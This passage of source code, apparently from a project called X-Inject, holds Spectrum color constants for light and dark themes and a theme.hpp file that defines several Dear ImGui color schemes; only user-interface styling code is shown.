 78 |     const unsigned int GRAY800 = Color(0x4B4B4B);
 79 |     const unsigned int GRAY900 = Color(0x2C2C2C);
 80 |     const unsigned int BLUE400 = Color(0x2680EB);
 81 |     const unsigned int BLUE500 = Color(0x1473E6);
 82 |     const unsigned int BLUE600 = Color(0x0D66D0);
 83 |     const unsigned int BLUE700 = Color(0x095ABA);
 84 |     const unsigned int RED400 = Color(0xE34850);
 85 |     const unsigned int RED500 = Color(0xD7373F);
 86 |     const unsigned int RED600 = Color(0xC9252D);
 87 |     const unsigned int RED700 = Color(0xBB121A);
 88 |     const unsigned int ORANGE400 = Color(0xE68619);
 89 |     const unsigned int ORANGE500 = Color(0xDA7B11);
 90 |     const unsigned int ORANGE600 = Color(0xCB6F10);
 91 |     const unsigned int ORANGE700 = Color(0xBD640D);
 92 |     const unsigned int GREEN400 = Color(0x2D9D78);
 93 |     const unsigned int GREEN500 = Color(0x268E6C);
 94 |     const unsigned int GREEN600 = Color(0x12805C);
 95 |     const unsigned int GREEN700 = Color(0x107154);
 96 |     const unsigned int INDIGO400 = Color(0x6767EC);
 97 |     const unsigned int INDIGO500 = Color(0x5C5CE0);
 98 |     const unsigned int INDIGO600 = Color(0x5151D3);
 99 |     const unsigned int INDIGO700 = Color(0x4646C6);
100 |     const unsigned int CELERY400 = Color(0x44B556);
101 |     const unsigned int CELERY500 = Color(0x3DA74E);
102 |     const unsigned int CELERY600 = Color(0x379947);
103 |     const unsigned int CELERY700 = Color(0x318B40);
104 |     const unsigned int MAGENTA400 = Color(0xD83790);
105 |     const unsigned int MAGENTA500 = Color(0xCE2783);
106 |     const unsigned int MAGENTA600 = Color(0xBC1C74);
107 |     const unsigned int MAGENTA700 = Color(0xAE0E66);
108 |     const unsigned int YELLOW400 = Color(0xDFBF00);
109 |     const unsigned int YELLOW500 = Color(0xD2B200);
110 |     const unsigned int YELLOW600 = Color(0xC4A600);
111 |     const unsigned int YELLOW700 = Color(0xB79900);
112 |     const unsigned int FUCHSIA400 = Color(0xC038CC);
113 |     const unsigned int FUCHSIA500 = Color(0xB130BD);
114 |     const unsigned int FUCHSIA600 = Color(0xA228AD);
115 |     const unsigned int FUCHSIA700 = Color(0x93219E);
116 |     const unsigned int SEAFOAM400 = Color(0x1B959A);
117 |     const unsigned int SEAFOAM500 = Color(0x16878C);
118 |     const unsigned int SEAFOAM600 = Color(0x0F797D);
119 |     const unsigned int SEAFOAM700 = Color(0x096C6F);
120 |     const unsigned int CHARTREUSE400 = Color(0x85D044);
121 |     const unsigned int CHARTREUSE500 = Color(0x7CC33F);
122 |     const unsigned int CHARTREUSE600 = Color(0x73B53A);
123 |     const unsigned int CHARTREUSE700 = Color(0x6AA834);
124 |     const unsigned int PURPLE400 = Color(0x9256D9);
125 |     const unsigned int PURPLE500 = Color(0x864CCC);
126 |     const unsigned int PURPLE600 = Color(0x7A42BF);
127 |     const unsigned int PURPLE700 = Color(0x6F38B1);
128 | #endif
129 | #ifdef SPECTRUM_USE_DARK_THEME
130 |     const unsigned int GRAY50 = Color(0x252525);
131 |     const unsigned int GRAY75 = Color(0x2F2F2F);
132 |     const unsigned int GRAY100 = Color(0x323232);
133 |     const unsigned int GRAY200 = Color(0x393939);
134 |     const unsigned int GRAY300 = Color(0x3E3E3E);
135 |     const unsigned int GRAY400 = Color(0x4D4D4D);
136 |     const unsigned int GRAY500 = Color(0x5C5C5C);
137 |     const unsigned int GRAY600 = Color(0x7B7B7B);
138 |     const unsigned int GRAY700 = Color(0x999999);
139 |     const unsigned int GRAY800 = Color(0xCDCDCD);
140 |     const unsigned int GRAY900 = Color(0xFFFFFF);
141 |     const unsigned int BLUE400 = Color(0x2680EB);
142 |     const unsigned int BLUE500 = Color(0x378EF0);
143 |     const unsigned int BLUE600 = Color(0x4B9CF5);
144 |     const unsigned int BLUE700 = Color(0x5AA9FA);
145 |     const unsigned int RED400 = Color(0xE34850);
146 |     const unsigned int RED500 = Color(0xEC5B62);
147 |     const unsigned int RED600 = Color(0xF76D74);
148 |     const unsigned int RED700 = Color(0xFF7B82);
149 |     const unsigned int ORANGE400 = Color(0xE68619);
150 |     const unsigned int ORANGE500 = Color(0xF29423);
151 |     const unsigned int ORANGE600 = Color(0xF9A43F);
152 |     const unsigned int ORANGE700 = Color(0xFFB55B);
153 |     const unsigned int GREEN400 = Color(0x2D9D78);
154 |     const unsigned int GREEN500 = Color(0x33AB84);
155 |     const unsigned int GREEN600 = Color(0x39B990);
156 |     const unsigned int GREEN700 = Color(0x3FC89C);
157 |     const unsigned int INDIGO400 = Color(0x6767EC);
158 |     const unsigned int INDIGO500 = Color(0x7575F1);
159 |     const unsigned int INDIGO600 = Color(0x8282F6);
160 |     const unsigned int INDIGO700 = Color(0x9090FA);
161 |     const unsigned int CELERY400 = Color(0x44B556);
162 |     const unsigned int CELERY500 = Color(0x4BC35F);
163 |     const unsigned int CELERY600 = Color(0x51D267);
164 |     const unsigned int CELERY700 = Color(0x58E06F);
165 |     const unsigned int MAGENTA400 = Color(0xD83790);
166 |     const unsigned int MAGENTA500 = Color(0xE2499D);
167 |     const unsigned int MAGENTA600 = Color(0xEC5AAA);
168 |     const unsigned int MAGENTA700 = Color(0xF56BB7);
169 |     const unsigned int YELLOW400 = Color(0xDFBF00);
170 |     const unsigned int YELLOW500 = Color(0xEDCC00);
171 |     const unsigned int YELLOW600 = Color(0xFAD900);
172 |     const unsigned int YELLOW700 = Color(0xFFE22E);
173 |     const unsigned int FUCHSIA400 = Color(0xC038CC);
174 |     const unsigned int FUCHSIA500 = Color(0xCF3EDC);
175 |     const unsigned int FUCHSIA600 = Color(0xD951E5);
176 |     const unsigned int FUCHSIA700 = Color(0xE366EF);
177 |     const unsigned int SEAFOAM400 = Color(0x1B959A);
178 |     const unsigned int SEAFOAM500 = Color(0x20A3A8);
179 |     const unsigned int SEAFOAM600 = Color(0x23B2B8);
180 |     const unsigned int SEAFOAM700 = Color(0x26C0C7);
181 |     const unsigned int CHARTREUSE400 = Color(0x85D044);
182 |     const unsigned int CHARTREUSE500 = Color(0x8EDE49);
183 |     const unsigned int CHARTREUSE600 = Color(0x9BEC54);
184 |     const unsigned int CHARTREUSE700 = Color(0xA3F858);
185 |     const unsigned int PURPLE400 = Color(0x9256D9);
186 |     const unsigned int PURPLE500 = Color(0x9D64E1);
187 |     const unsigned int PURPLE600 = Color(0xA873E9);
188 |     const unsigned int PURPLE700 = Color(0xB483F0);
189 | #endif
190 | }


--------------------------------------------------------------------------------
/X-Inject/app/utils/theme.hpp:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | 
  3 | #include "./spectrum.h"
  4 | #include "../../ext/imgui.h"
  5 | #include "../../ext/imconfig.h"
  6 | 
  7 | namespace Theme {
  8 | 	void ClassicDark() {
  9 | 		ImGui::StyleColorsDark();
 10 | 	}
 11 | 
 12 | 	void embraceTheDarkness()
 13 | 	{
 14 | 		ImGui::StyleColorsDark();
 15 | 		ImVec4* colors = ImGui::GetStyle().Colors;
 16 | 		colors[ImGuiCol_Text] = ImVec4(0.99f, 0.99f, 0.99f, 0.99f);
 17 | 		colors[ImGuiCol_TextDisabled] = ImVec4(0.50f, 0.50f, 0.50f, 1.00f);
 18 | 		colors[ImGuiCol_WindowBg] = ImVec4(0.10f, 0.10f, 0.10f, 1.00f);
 19 | 		colors[ImGuiCol_ChildBg] = ImVec4(0.00f, 0.00f, 0.00f, 0.00f);
 20 | 		colors[ImGuiCol_PopupBg] = ImVec4(0.19f, 0.19f, 0.19f, 0.92f);
 21 | 		colors[ImGuiCol_Border] = ImVec4(0.19f, 0.19f, 0.19f, 0.29f);
 22 | 		colors[ImGuiCol_BorderShadow] = ImVec4(0.00f, 0.00f, 0.00f, 0.24f);
 23 | 		colors[ImGuiCol_FrameBg] = ImVec4(0.05f, 0.05f, 0.05f, 0.54f);
 24 | 		colors[ImGuiCol_FrameBgHovered] = ImVec4(0.19f, 0.19f, 0.19f, 0.54f);
 25 | 		colors[ImGuiCol_FrameBgActive] = ImVec4(0.20f, 0.22f, 0.23f, 1.00f);
 26 | 		colors[ImGuiCol_TitleBg] = ImVec4(0.00f, 0.00f, 0.00f, 1.00f);
 27 | 		colors[ImGuiCol_TitleBgActive] = ImVec4(0.06f, 0.06f, 0.06f, 1.00f);
 28 | 		colors[ImGuiCol_TitleBgCollapsed] = ImVec4(0.00f, 0.00f, 0.00f, 1.00f);
 29 | 		colors[ImGuiCol_MenuBarBg] = ImVec4(0.14f, 0.14f, 0.14f, 1.00f);
 30 | 		colors[ImGuiCol_ScrollbarBg] = ImVec4(0.05f, 0.05f, 0.05f, 0.54f);
 31 | 		colors[ImGuiCol_ScrollbarGrab] = ImVec4(0.34f, 0.34f, 0.34f, 0.54f);
 32 | 		colors[ImGuiCol_ScrollbarGrabHovered] = ImVec4(0.40f, 0.40f, 0.40f, 0.54f);
 33 | 		colors[ImGuiCol_ScrollbarGrabActive] = ImVec4(0.56f, 0.56f, 0.56f, 0.54f);
 34 | 		colors[ImGuiCol_CheckMark] = ImVec4(0.33f, 0.67f, 0.86f, 1.00f);
 35 | 		colors[ImGuiCol_SliderGrab] = ImVec4(0.34f, 0.34f, 0.34f, 0.54f);
 36 | 		colors[ImGuiCol_SliderGrabActive] = ImVec4(0.56f, 0.56f, 0.56f, 0.54f);
 37 | 		colors[ImGuiCol_Button] = ImVec4(0.05f, 0.05f, 0.05f, 0.54f);
 38 | 		colors[ImGuiCol_ButtonHovered] = ImVec4(0.19f, 0.19f, 0.19f, 0.54f);
 39 | 		colors[ImGuiCol_ButtonActive] = ImVec4(0.20f, 0.22f, 0.23f, 1.00f);
 40 | 		colors[ImGuiCol_Header] = ImVec4(0.00f, 0.00f, 0.00f, 0.52f);
 41 | 		colors[ImGuiCol_HeaderHovered] = ImVec4(0.00f, 0.00f, 0.00f, 0.36f);
 42 | 		colors[ImGuiCol_HeaderActive] = ImVec4(0.20f, 0.22f, 0.23f, 0.33f);
 43 | 		colors[ImGuiCol_Separator] = ImVec4(0.28f, 0.28f, 0.28f, 0.29f);
 44 | 		colors[ImGuiCol_SeparatorHovered] = ImVec4(0.44f, 0.44f, 0.44f, 0.29f);
 45 | 		colors[ImGuiCol_SeparatorActive] = ImVec4(0.40f, 0.44f, 0.47f, 1.00f);
 46 | 		colors[ImGuiCol_ResizeGrip] = ImVec4(0.28f, 0.28f, 0.28f, 0.29f);
 47 | 		colors[ImGuiCol_ResizeGripHovered] = ImVec4(0.44f, 0.44f, 0.44f, 0.29f);
 48 | 		colors[ImGuiCol_ResizeGripActive] = ImVec4(0.40f, 0.44f, 0.47f, 1.00f);
 49 | 		colors[ImGuiCol_Tab] = ImVec4(0.00f, 0.00f, 0.00f, 0.52f);
 50 | 		colors[ImGuiCol_TabHovered] = ImVec4(0.14f, 0.14f, 0.14f, 1.00f);
 51 | 		colors[ImGuiCol_TabActive] = ImVec4(0.20f, 0.20f, 0.20f, 0.36f);
 52 | 		colors[ImGuiCol_TabUnfocused] = ImVec4(0.00f, 0.00f, 0.00f, 0.52f);
 53 | 		colors[ImGuiCol_TabUnfocusedActive] = ImVec4(0.14f, 0.14f, 0.14f, 1.00f);
 54 | 		colors[ImGuiCol_DockingPreview] = ImVec4(0.33f, 0.67f, 0.86f, 1.00f);
 55 | 		colors[ImGuiCol_DockingEmptyBg] = ImVec4(1.00f, 0.00f, 0.00f, 1.00f);
 56 | 		colors[ImGuiCol_PlotLines] = ImVec4(1.00f, 0.00f, 0.00f, 1.00f);
 57 | 		colors[ImGuiCol_PlotLinesHovered] = ImVec4(1.00f, 0.00f, 0.00f, 1.00f);
 58 | 		colors[ImGuiCol_PlotHistogram] = ImVec4(1.00f, 0.00f, 0.00f, 1.00f);
 59 | 		colors[ImGuiCol_PlotHistogramHovered] = ImVec4(1.00f, 0.00f, 0.00f, 1.00f);
 60 | 		colors[ImGuiCol_TableHeaderBg] = ImVec4(0.00f, 0.00f, 0.00f, 0.52f);
 61 | 		colors[ImGuiCol_TableBorderStrong] = ImVec4(0.00f, 0.00f, 0.00f, 0.52f);
 62 | 		colors[ImGuiCol_TableBorderLight] = ImVec4(0.28f, 0.28f, 0.28f, 0.29f);
 63 | 		colors[ImGuiCol_TableRowBg] = ImVec4(0.00f, 0.00f, 0.00f, 0.00f);
 64 | 		colors[ImGuiCol_TableRowBgAlt] = ImVec4(1.00f, 1.00f, 1.00f, 0.06f);
 65 | 		colors[ImGuiCol_TextSelectedBg] = ImVec4(0.20f, 0.22f, 0.23f, 1.00f);
 66 | 		colors[ImGuiCol_DragDropTarget] = ImVec4(0.33f, 0.67f, 0.86f, 1.00f);
 67 | 		colors[ImGuiCol_NavHighlight] = ImVec4(1.00f, 0.00f, 0.00f, 1.00f);
 68 | 		colors[ImGuiCol_NavWindowingHighlight] = ImVec4(1.00f, 0.00f, 0.00f, 0.70f);
 69 | 		colors[ImGuiCol_NavWindowingDimBg] = ImVec4(1.00f, 0.00f, 0.00f, 0.20f);
 70 | 		colors[ImGuiCol_ModalWindowDimBg] = ImVec4(1.00f, 0.00f, 0.00f, 0.35f);
 71 | 
 72 | 	}
 73 | 
 74 | 	void purpeDragon() {
 75 | 		ImGui::StyleColorsDark();
 76 | 		auto& colors = ImGui::GetStyle().Colors;
 77 | 		colors[ImGuiCol_WindowBg] = ImVec4{ 0.1f, 0.1f, 0.13f, 1.0f };
 78 | 		colors[ImGuiCol_MenuBarBg] = ImVec4{ 0.16f, 0.16f, 0.21f, 1.0f };
 79 | 
 80 | 		// Border
 81 | 		colors[ImGuiCol_Border] = ImVec4{ 0.44f, 0.37f, 0.61f, 0.29f };
 82 | 		colors[ImGuiCol_BorderShadow] = ImVec4{ 0.0f, 0.0f, 0.0f, 0.24f };
 83 | 
 84 | 		// Text
 85 | 		colors[ImGuiCol_Text] = ImVec4{ 1.0f, 1.0f, 1.0f, 1.0f };
 86 | 		colors[ImGuiCol_TextDisabled] = ImVec4{ 0.5f, 0.5f, 0.5f, 1.0f };
 87 | 
 88 | 		// Headers
 89 | 		colors[ImGuiCol_Header] = ImVec4{ 0.13f, 0.13f, 0.17, 1.0f };
 90 | 		colors[ImGuiCol_HeaderHovered] = ImVec4{ 0.19f, 0.2f, 0.25f, 1.0f };
 91 | 		colors[ImGuiCol_HeaderActive] = ImVec4{ 0.16f, 0.16f, 0.21f, 1.0f };
 92 | 
 93 | 		// Buttons
 94 | 		colors[ImGuiCol_Button] = ImVec4{ 0.13f, 0.13f, 0.17, 1.0f };
 95 | 		colors[ImGuiCol_ButtonHovered] = ImVec4{ 0.19f, 0.2f, 0.25f, 1.0f };
 96 | 		colors[ImGuiCol_ButtonActive] = ImVec4{ 0.16f, 0.16f, 0.21f, 1.0f };
 97 | 		colors[ImGuiCol_CheckMark] = ImVec4{ 0.74f, 0.58f, 0.98f, 1.0f };
 98 | 
 99 | 		// Popups
100 | 		colors[ImGuiCol_PopupBg] = ImVec4{ 0.1f, 0.1f, 0.13f, 0.92f };
101 | 
102 | 		// Slider
103 | 		colors[ImGuiCol_SliderGrab] = ImVec4{ 0.44f, 0.37f, 0.61f, 0.54f };
104 | 		colors[ImGuiCol_SliderGrabActive] = ImVec4{ 0.74f, 0.58f, 0.98f, 0.54f };
105 | 
106 | 		// Frame BG
107 | 		colors[ImGuiCol_FrameBg] = ImVec4{ 0.13f, 0.13, 0.17, 1.0f };
108 | 		colors[ImGuiCol_FrameBgHovered] = ImVec4{ 0.19f, 0.2f, 0.25f, 1.0f };
109 | 		colors[ImGuiCol_FrameBgActive] = ImVec4{ 0.16f, 0.16f, 0.21f, 1.0f };
110 | 
111 | 		// Tabs
112 | 		colors[ImGuiCol_Tab] = ImVec4{ 0.16f, 0.16f, 0.21f, 1.0f };
113 | 		colors[ImGuiCol_TabHovered] = ImVec4{ 0.24, 0.24f, 0.32f, 1.0f };
114 | 		colors[ImGuiCol_TabActive] = ImVec4{ 0.2f, 0.22f, 0.27f, 1.0f };
115 | 		colors[ImGuiCol_TabUnfocused] = ImVec4{ 0.16f, 0.16f, 0.21f, 1.0f };
116 | 		colors[ImGuiCol_TabUnfocusedActive] = ImVec4{ 0.16f, 0.16f, 0.21f, 1.0f };
117 | 
118 | 		// Title
119 | 		colors[ImGuiCol_TitleBg] = ImVec4{ 0.16f, 0.16f, 0.21f, 1.0f };
120 | 		colors[ImGuiCol_TitleBgActive] = ImVec4{ 0.16f, 0.16f, 0.21f, 1.0f };
121 | 		colors[ImGuiCol_TitleBgCollapsed] = ImVec4{ 0.16f, 0.16f, 0.21f, 1.0f };
122 | 
123 | 		// Scrollbar
124 | 		colors[ImGuiCol_ScrollbarBg] = ImVec4{ 0.1f, 0.1f, 0.13f, 1.0f };
125 | 		colors[ImGuiCol_ScrollbarGrab] = ImVec4{ 0.16f, 0.16f, 0.21f, 1.0f };
126 | 		colors[ImGuiCol_ScrollbarGrabHovered] = ImVec4{ 0.19f, 0.2f, 0.25f, 1.0f };
127 | 		colors[ImGuiCol_ScrollbarGrabActive] = ImVec4{ 0.24f, 0.24f, 0.32f, 1.0f };
128 | 
129 | 		// Seperator
130 | 		colors[ImGuiCol_Separator] = ImVec4{ 0.44f, 0.37f, 0.61f, 1.0f };
131 | 		colors[ImGuiCol_SeparatorHovered] = ImVec4{ 0.74f, 0.58f, 0.98f, 1.0f };
132 | 		colors[ImGuiCol_SeparatorActive] = ImVec4{ 0.84f, 0.58f, 1.0f, 1.0f };
133 | 
134 | 		// Resize Grip
135 | 		colors[ImGuiCol_ResizeGrip] = ImVec4{ 0.44f, 0.37f, 0.61f, 0.29f };
136 | 		colors[ImGuiCol_ResizeGripHovered] = ImVec4{ 0.74f, 0.58f, 0.98f, 0.29f };
137 | 		colors[ImGuiCol_ResizeGripActive] = ImVec4{ 0.84f, 0.58f, 1.0f, 0.29f };
138 | 
139 | 		// Docking
140 | 		colors[ImGuiCol_DockingPreview] = ImVec4{ 0.44f, 0.37f, 0.61f, 1.0f };
141 | 
142 | 		auto& style = ImGui::GetStyle();
143 | 		//style.TabRounding = 4;
144 | 		//style.ScrollbarRounding = 9;
145 | 		//style.WindowRounding = 7;
146 | 		//style.GrabRounding = 3;
147 | 		//style.FrameRounding = 3;
148 | 		//style.PopupRounding = 4;
149 | 		//style.ChildRounding = 4;
150 | 	}
151 | 
152 | 	void enemymouse() {
153 | 		ImGui::StyleColorsDark();
154 | 		ImGuiStyle& style = ImGui::GetStyle();
155 | 		//style.Alpha = 1.0;
156 | 		//style.WindowFillAlphaDefault = 0.83;
157 | 		//style.ChildRounding = 3;
158 | 		//style.WindowRounding = 3;
159 | 		//style.GrabRounding = 1;
160 | 		//style.GrabMinSize = 20;
161 | 		//style.FrameRounding = 3;
162 | 
163 | 
164 | 		style.Colors[ImGuiCol_Text] = ImVec4(0.00f, 1.00f, 1.00f, 1.00f);
165 | 		style.Colors[ImGuiCol_TextDisabled] = ImVec4(0.00f, 0.40f, 0.41f, 1.00f);
166 | 		style.Colors[ImGuiCol_WindowBg] = ImVec4(0.00f, 0.00f, 0.00f, 1.00f);
167 | 		style.Colors[ImGuiCol_ChildBg] = ImVec4(0.00f, 0.00f, 0.00f, 0.00f);
168 | 		style.Colors[ImGuiCol_Border] = ImVec4(0.00f, 1.00f, 1.00f, 0.65f);
169 | 		style.Colors[ImGuiCol_BorderShadow] = ImVec4(0.00f, 0.00f, 0.00f, 0.00f);
170 | 		style.Colors[ImGuiCol_FrameBg] = ImVec4(0.44f, 0.80f, 0.80f, 0.18f);
171 | 		style.Colors[ImGuiCol_FrameBgHovered] = ImVec4(0.44f, 0.80f, 0.80f, 0.27f);
172 | 		style.Colors[ImGuiCol_FrameBgActive] = ImVec4(0.44f, 0.81f, 0.86f, 0.66f);
173 | 		style.Colors[ImGuiCol_TitleBg] = ImVec4(0.14f, 0.18f, 0.21f, 0.73f);
174 | 		style.Colors[ImGuiCol_TitleBgCollapsed] = ImVec4(0.00f, 0.00f, 0.00f, 0.54f);
175 | 		style.Colors[ImGuiCol_TitleBgActive] = ImVec4(0.00f, 1.00f, 1.00f, 0.27f);
176 | 		style.Colors[ImGuiCol_MenuBarBg] = ImVec4(0.00f, 0.00f, 0.00f, 0.20f);
177 | 		style.Colors[ImGuiCol_ScrollbarBg] = ImVec4(0.22f, 0.29f, 0.30f, 0.71f);
178 | 		style.Colors[ImGuiCol_ScrollbarGrab] = ImVec4(0.00f, 1.00f, 1.00f, 0.44f);
179 | 		style.Colors[ImGuiCol_ScrollbarGrabHovered] = ImVec4(0.00f, 1.00f, 1.00f, 0.74f);
180 | 		style.Colors[ImGuiCol_ScrollbarGrabActive] = ImVec4(0.00f, 1.00f, 1.00f, 1.00f);
181 | 		style.Colors[ImGuiCol_PopupBg] = ImVec4(0.16f, 0.24f, 0.22f, 0.60f);
182 | 		style.Colors[ImGuiCol_CheckMark] = ImVec4(0.00f, 1.00f, 1.00f, 0.68f);
183 | 		style.Colors[ImGuiCol_SliderGrab] = ImVec4(0.00f, 1.00f, 1.00f, 0.36f);
184 | 		style.Colors[ImGuiCol_SliderGrabActive] = ImVec4(0.00f, 1.00f, 1.00f, 0.76f);
185 | 		style.Colors[ImGuiCol_Button] = ImVec4(0.00f, 0.65f, 0.65f, 0.46f);
186 | 		style.Colors[ImGuiCol_ButtonHovered] = ImVec4(0.01f, 1.00f, 1.00f, 0.43f);
187 | 		style.Colors[ImGuiCol_ButtonActive] = ImVec4(0.00f, 1.00f, 1.00f, 0.62f);
188 | 		style.Colors[ImGuiCol_Header] = ImVec4(0.00f, 1.00f, 1.00f, 0.33f);
189 | 		style.Colors[ImGuiCol_HeaderHovered] = ImVec4(0.00f, 1.00f, 1.00f, 0.42f);
190 | 		style.Colors[ImGuiCol_HeaderActive] = ImVec4(0.00f, 1.00f, 1.00f, 0.54f);
191 | 		style.Colors[ImGuiCol_Separator] = ImVec4(0.00f, 0.50f, 0.50f, 0.33f);
192 | 		style.Colors[ImGuiCol_SeparatorHovered] = ImVec4(0.00f, 0.50f, 0.50f, 0.47f);
193 | 		style.Colors[ImGuiCol_SeparatorActive] = ImVec4(0.00f, 0.70f, 0.70f, 1.00f);
194 | 		style.Colors[ImGuiCol_ResizeGrip] = ImVec4(0.00f, 1.00f, 1.00f, 0.54f);
195 | 		style.Colors[ImGuiCol_ResizeGripHovered] = ImVec4(0.00f, 1.00f, 1.00f, 0.74f);
196 | 		style.Colors[ImGuiCol_ResizeGripActive] = ImVec4(0.00f, 1.00f, 1.00f, 1.00f);
197 | 		style.Colors[ImGuiCol_PlotLines] = ImVec4(0.00f, 1.00f, 1.00f, 1.00f);
198 | 		style.Colors[ImGuiCol_PlotLinesHovered] = ImVec4(0.00f, 1.00f, 1.00f, 1.00f);
199 | 		style.Colors[ImGuiCol_PlotHistogram] = ImVec4(0.00f, 1.00f, 1.00f, 1.00f);
200 | 		style.Colors[ImGuiCol_PlotHistogramHovered] = ImVec4(0.00f, 1.00f, 1.00f, 1.00f);
201 | 		style.Colors[ImGuiCol_TextSelectedBg] = ImVec4(0.00f, 1.00f, 1.00f, 0.22f);
202 | 		style.Colors[ImGuiCol_PopupBg] = ImVec4(0.00f, 0.13f, 0.13f, 0.90f);
203 | 		style.Colors[ImGuiCol_ModalWindowDimBg] = ImVec4(0.04f, 0.10f, 0.09f, 0.51f);
204 | 	}
205 | 
206 | 	void simongeilfus() {
207 | 		ImGui::StyleColorsDark();
208 | 		ImGuiStyle& style = ImGui::GetStyle();
209 | 		style.Colors[ImGuiCol_Text] = ImVec4(0.86f, 0.93f, 0.89f, 0.78f);
210 | 		style.Colors[ImGuiCol_TextDisabled] = ImVec4(0.86f, 0.93f, 0.89f, 0.28f);
211 | 		style.Colors[ImGuiCol_WindowBg] = ImVec4(0.13f, 0.14f, 0.17f, 1.00f);
212 | 		style.Colors[ImGuiCol_Border] = ImVec4(0.31f, 0.31f, 1.00f, 0.00f);
213 | 		style.Colors[ImGuiCol_BorderShadow] = ImVec4(0.00f, 0.00f, 0.00f, 0.00f);
214 | 		style.Colors[ImGuiCol_FrameBg] = ImVec4(0.20f, 0.22f, 0.27f, 1.00f);
215 | 		style.Colors[ImGuiCol_FrameBgHovered] = ImVec4(0.92f, 0.18f, 0.29f, 0.78f);
216 | 		style.Colors[ImGuiCol_FrameBgActive] = ImVec4(0.92f, 0.18f, 0.29f, 1.00f);
217 | 		style.Colors[ImGuiCol_TitleBg] = ImVec4(0.20f, 0.22f, 0.27f, 1.00f);
218 | 		style.Colors[ImGuiCol_TitleBgCollapsed] = ImVec4(0.20f, 0.22f, 0.27f, 0.75f);
219 | 		style.Colors[ImGuiCol_TitleBgActive] = ImVec4(0.92f, 0.18f, 0.29f, 1.00f);
220 | 		style.Colors[ImGuiCol_MenuBarBg] = ImVec4(0.20f, 0.22f, 0.27f, 0.47f);
221 | 		style.Colors[ImGuiCol_ScrollbarBg] = ImVec4(0.20f, 0.22f, 0.27f, 1.00f);
222 | 		style.Colors[ImGuiCol_ScrollbarGrab] = ImVec4(0.09f, 0.15f, 0.16f, 1.00f);
223 | 		style.Colors[ImGuiCol_ScrollbarGrabHovered] = ImVec4(0.92f, 0.18f, 0.29f, 0.78f);
224 | 		style.Colors[ImGuiCol_ScrollbarGrabActive] = ImVec4(0.92f, 0.18f, 0.29f, 1.00f);
225 | 		style.Colors[ImGuiCol_CheckMark] = ImVec4(0.71f, 0.22f, 0.27f, 1.00f);
226 | 		style.Colors[ImGuiCol_SliderGrab] = ImVec4(0.47f, 0.77f, 0.83f, 0.14f);
227 | 		style.Colors[ImGuiCol_SliderGrabActive] = ImVec4(0.92f, 0.18f, 0.29f, 1.00f);
228 | 		style.Colors[ImGuiCol_Button] = ImVec4(0.47f, 0.77f, 0.83f, 0.14f);
229 | 		style.Colors[ImGuiCol_ButtonHovered] = ImVec4(0.92f, 0.18f, 0.29f, 0.86f);
230 | 		style.Colors[ImGuiCol_ButtonActive] = ImVec4(0.92f, 0.18f, 0.29f, 1.00f);
231 | 		style.Colors[ImGuiCol_Header] = ImVec4(0.92f, 0.18f, 0.29f, 0.76f);
232 | 		style.Colors[ImGuiCol_HeaderHovered] = ImVec4(0.92f, 0.18f, 0.29f, 0.86f);
233 | 		style.Colors[ImGuiCol_HeaderActive] = ImVec4(0.92f, 0.18f, 0.29f, 1.00f);
234 | 		style.Colors[ImGuiCol_Separator] = ImVec4(0.14f, 0.16f, 0.19f, 1.00f);
235 | 		style.Colors[ImGuiCol_SeparatorHovered] = ImVec4(0.92f, 0.18f, 0.29f, 0.78f);
236 | 		style.Colors[ImGuiCol_SeparatorActive] = ImVec4(0.92f, 0.18f, 0.29f, 1.00f);
237 | 		style.Colors[ImGuiCol_ResizeGrip] = ImVec4(0.47f, 0.77f, 0.83f, 0.04f);
238 | 		style.Colors[ImGuiCol_ResizeGripHovered] = ImVec4(0.92f, 0.18f, 0.29f, 0.78f);
239 | 		style.Colors[ImGuiCol_ResizeGripActive] = ImVec4(0.92f, 0.18f, 0.29f, 1.00f);
240 | 		style.Colors[ImGuiCol_PlotLines] = ImVec4(0.86f, 0.93f, 0.89f, 0.63f);
241 | 		style.Colors[ImGuiCol_PlotLinesHovered] = ImVec4(0.92f, 0.18f, 0.29f, 1.00f);
242 | 		style.Colors[ImGuiCol_PlotHistogram] = ImVec4(0.86f, 0.93f, 0.89f, 0.63f);
243 | 		style.Colors[ImGuiCol_PlotHistogramHovered] = ImVec4(0.92f, 0.18f, 0.29f, 1.00f);
244 | 		style.Colors[ImGuiCol_TextSelectedBg] = ImVec4(0.92f, 0.18f, 0.29f, 0.43f);
245 | 		style.Colors[ImGuiCol_PopupBg] = ImVec4(0.20f, 0.22f, 0.27f, 0.9f);
246 | 	}
247 | 
248 | 	void adobe() {
249 | 		ImGui::StyleColorsDark();
250 | 		ImGuiStyle* style = &ImGui::GetStyle();
251 | 		style->GrabRounding = 4.0f;
252 | 
253 | 		ImVec4* colors = style->Colors;
254 | 		colors[ImGuiCol_TableHeaderBg] = ImVec4(0.50f, 0.50f, 0.50f, 0.52f);
255 | 		colors[ImGuiCol_Tab] = ImVec4(0.50f, 0.50f, 0.50f, 0.50f);
256 | 		colors[ImGuiCol_TabHovered] = ImVec4(0.70f, 0.70f, 0.70f, 0.50f);
257 | 		colors[ImGuiCol_TabActive] = ImVec4(0.90f, 0.90f, 0.90f, 0.7f);
258 | 
259 | 		colors[ImGuiCol_Text] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY800); // text on hovered controls is gray900
260 | 		colors[ImGuiCol_TextDisabled] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY500);
261 | 		colors[ImGuiCol_WindowBg] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY100);
262 | 		colors[ImGuiCol_ChildBg] = ImVec4(0.00f, 0.00f, 0.00f, 0.00f);
263 | 		colors[ImGuiCol_PopupBg] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY50); // not sure about this. Note: applies to tooltips too.
264 | 		colors[ImGuiCol_Border] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY300);
265 | 		colors[ImGuiCol_BorderShadow] = ImGui::ColorConvertU32ToFloat4(Spectrum::Static::NONE); // We don't want shadows. Ever.
266 | 		colors[ImGuiCol_FrameBg] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY75); // this isnt right, spectrum does not do this, but it's a good fallback
267 | 		colors[ImGuiCol_FrameBgHovered] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY50);
268 | 		colors[ImGuiCol_FrameBgActive] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY200);
269 | 		colors[ImGuiCol_TitleBg] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY100); // those titlebar values are totally made up, spectrum does not have this.
